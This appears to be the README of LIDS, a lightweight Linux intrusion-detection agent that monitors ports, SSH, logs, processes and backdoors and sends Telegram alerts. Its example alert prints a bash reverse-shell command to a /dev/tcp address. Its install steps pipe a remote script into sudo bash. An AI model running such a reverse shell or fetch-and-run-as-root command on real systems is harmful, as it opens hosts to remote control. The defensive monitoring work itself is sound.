Real-time attack detection · Telegram alerts
Lightweight host-based security monitoring agent for
Kali Linux · Parrot OS · Arch Linux
|
Python |
Linux |
 MIT |
| Module | What it detects |
|---|---|
| Port Monitor | New ports opened, suspicious ports (4444,1337 etc.) |
| SSH Monitor | Weak SSH configs, root login, password auth |
| Log Monitor | Brute force attacks, login abuse |
| Backdoor Scanner | Reverse shells, cron persistence |
| Process Monitor | Cryptominers, suspicious binaries |
| Malware Scan | rkhunter / chkrootkit integration |
| Firewall Control | Block IP with iptables / ufw |
| Telegram Alerts | Real-time attack notifications |
git clone https://github.com/Yescrypt/lids
cd lids
sudo bash install.sh
curl -s https://raw.githubusercontent.com/Yescrypt/lids/main/install.sh | sudo bashInstaller asks:
- Hostname label
- OS name
- Telegram User ID
LIDS then registers and starts monitoring.
🚨 SSH Brute Force Attack
Host: kali-lab
IP: 185.x.x.x
Attempts: 32
[🚫 BLOCK IP] [🔍 WHOIS] [IGNORE]
🚨 Reverse Shell Detected
PID: 2211
CMD: bash -i >& /dev/tcp/192.168.1.5/4444
[KILL] [TRACE] [IGNORE]
/etc/lids/lids.conf
{
"scan_interval": 30,
"whitelist_ports": [22,80,443],
"whitelist_processes": ["nmap","netcat"],
"whitelist_ips": []
}systemctl status lids
systemctl restart lids
tail -f /var/log/lids/lids.logReport vulnerabilities responsibly:
@anonim_xatbot
MIT License © 2026 LIDS Contributors
See the LICENSE file for details.